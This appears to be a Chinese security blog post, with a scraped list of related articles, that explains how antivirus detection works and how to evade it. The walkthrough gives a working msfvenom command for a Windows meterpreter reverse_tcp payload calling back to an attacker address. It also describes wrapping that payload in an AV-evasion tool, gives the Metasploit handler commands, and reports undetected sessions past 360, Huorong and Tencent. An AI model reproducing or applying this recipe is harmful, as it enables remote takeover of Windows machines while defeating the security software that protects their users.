Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家
前言
分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷
杀毒原理
360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。
1.基于特征码的静态扫描技术
这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今病毒技术迅猛发展的形势下已经起不到很好的作用了。
2.启发式扫描
为了对付病毒的不断变化和对未知病毒的研究,启发式扫描方式出现了。启发式扫描是通过分析指令出现的顺序,或特定组合情况等常见病毒的标准特征来判断文件是否感染未知病毒。
可以根据扫描特定的行为或多种行为的组合来判断一个程序是否是病毒。例如,制定一套打分机制,在系统目录下释放文件得20分,对分区进行格式化得100分,对启动项进行操作得50分等,只要评分达到某个预设值,即可判断为病毒文件。
3.虚拟机技术
查毒引擎中的虚拟机,并不是像VMWare的工作原理那样,为待查的可执行程序创建一个虚拟的执行环境,提供它可能用到的一切元素,包括硬盘,端口等,让它在其上自由发挥,最后根据其行为来判定是否为病毒。
设计虚拟机查毒的目的,就是为了对付加密变形病毒,虚拟机首先从文件中确定并读取病毒入口处代码,然后以上述工作步骤解释执行病毒头部的解密段(Decryptor),最后在执行完的结果(解密后的病毒体明文)中查找病毒的特征码。
免杀技术
1.修改特征码
既然杀毒软件在最开始时,使用了病毒特征码概念,那么我们可以通过修改病毒特征码的方式躲过杀软扫描。
第一种是更改特征码,例如:一个文件在某一个地址内有 “灰鸽子上线成功” 这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了。
第二种是根据校验和查杀技术提出的免杀思想,如果一个文件某个特定区域的校验和符合病毒库中的特征,那么反病毒软件就会报警。如果想阻止反病毒软件报警,只要对病毒的特定区域进行一定的更改,就会使这一区域的校验和改变,从而达到欺骗反病毒软件的目的。
2.花指令免杀
花指令免杀是指,在程序shellcode或特征代码区域增添垃圾指令,这些指令没有实际含义,不会改变程序运行逻辑,但可以阻止反编译,现在杀软在检测特征码时,都会存在偏移范围,当我们使用花指令对特征码区域进行大量填充,这样就可以实现躲避杀软的特性。
3.加壳免杀
加壳,程序加壳可以很好的躲避匹配特征码查杀方式,加密壳基本上可以把特征码全部掩盖。这里说的壳指加密壳,一些普通压缩壳,并不能起到改变特征码的效果,例如:UPX、ASPack等。
现在杀软会在检测到文件采用加密壳之后,直接提醒用户,该文件存在问题。可以使用不常见加密壳对程序进行加壳,来躲避杀软,该方法理论可用,只通过加壳实现免杀,成功几率很小,现在基于虚拟机技术,内存监测技术的发展,通过加壳方式进行免杀的思路越来越窄。
4.二次编译
msfvenom提供了多种格式的payload和encoder,生成的shellcode也为二次加工提供了很大便利,但是也被各大厂商盯得死死的。
而shikata_ga_nai是msf中唯一的评价是excellent的编码器,这种多态编码技术使得每次生成的攻击载荷文件是不一样的,编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。
目前msfvenom的encoder特征基本都进入了杀软的漏洞库。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。
借鉴KeePassX大佬的文章:https://www.freebuf.com/articles/web/271271.html
Shellcode免杀测试
测试需要用到:攻击机kali、掩日3.0、虚拟机win10系统
掩日3.0下载安装:https://github.com/1y0n/AV_Evasion_Tool
需要3.x 依赖:
1.64位 Windows 7、8、10 操作系统
2. .net framework 4.0 或更高版本 (Windows 自带)
3. tdm-gcc
启动MSF使用msfvenom生成一个shellcode.c文件出来
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=6666 -f c > /root/sheelcode.c
得到的shellcode.c如下
然后我们使用掩日3.0进行傻瓜式免杀
生成好之后我们先试试各大杀毒平台的静态杀毒扫描检测
1.火绒
2.腾讯管家
3.360安全卫士
以上检测360安全卫士、火绒安全、腾讯管家成功bypass
然后我们运行msf平台监听木马试试各大平台的杀毒动态检测
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.130
set lport 6666
run
直接上线没有拦截、检测到,最后总结:害,有免杀总比没有好,哈哈哈哈哈QAQ
Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家相关推荐
- 红队培训班作业 | 免杀过360和火绒 四种方法大对比
文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
- Invoke-Obfuscation混淆免杀过360和火绒
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021-05-31 Invoke-Obfuscation下载地址:https://github.com/danielbohannon/Inv ...
- mimikatz免杀过360和火绒
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网.也可以通过明文密码或者hash值 ...
- 2023最新使用python进行shellcode免杀过360火绒 ,反虚拟机
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185 反虚拟机方案根据虚拟机系统文件 cpu核心数 开机启动时间 c盘大小判断 生成c语言的payloa ...
- MSF(3)——apk和exe的加马(过360、火绒)
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 工具地址 shielden 520apkhook exe 加马 shellter附加 安装 软件准备 添加后门 杀软测试 加 ...
- 360safe.php绕过,venom结合Metasploit绕过360安全卫士
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了 一些 Veil-Evasion.py, unicorn. ...
- 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
- Shellcode免杀,过360、火绒、windows-Defender
shellcode简介 Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代 ...
- python加载shellcode免杀 简介
目录 前言 0X00 基础概念 1. python ctypes模块介绍 2. dll动态链接库 3. pyinstaller 4. shellcode 5.关于windows defender 6 ...
最新文章
- 【Redfin SDE intern】跪经
- dockefile nginx php,dockerfile自动部署nginx+php7
- CDN和Web Cache领域相关的经典书籍推荐
- insight-vmi 编译中的问题
- Kotlin学习 PART 3:类,对象和接口
- 【Python】Django生成API 文档
- 安卓 camera 调用流程_[Camera]Camera1 open、preview、take picture流程分析(3)
- 线段树(假)练习题一(学校OJ的题)
- 【WebRTC---入门篇】(十)NAT
- java 的单态模式(只可以创建一个对象)
- win10下装黑苹果双系统_预算5000的黑苹果/WIN双系统台式电脑组装建议
- 怎么把音乐WAV格式转换为MP3格式
- 计算机本科生可以发SCI论文吗?
- 硬盘的免费分区工具:简单、易用
- 红灯三秒亮一次,绿灯一秒亮一次,黄灯2秒亮一次;如何让三个灯不断交替重复亮灯?
- web页面-电子签名
- 用计算机写作文主题,用计算机写作文教学设计.doc
- jQuery中的end()的用法与定义
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
- python 移动一个文件或目录
热门文章
- opencv3_java 在已有的图像上画圆圈 CircleOnImg
- 强化学习中on policy和off policy的区别-深度理解
- 获取异常信息里再出异常就找不到日志了,我TM人傻了
- 运动基元(二):贝塞尔曲线
- access团员人数公式_ACCESS选择模拟题
- 在C++中同一个项目下两个.cpp文件中都用到main函数时,C++编译器会进行如下提示1.LNK2005_main 已经在 写文件.obj 2.LNK1169 找到一个多个多重定义的符号。
- cannot find module providing package
- PDM图纸管理软件_PDM图纸管理系统
- Nuxt 动态路由传参
- 加拿大约克大学计算机科学博士,约克大学计算机专业的offer你get了吗?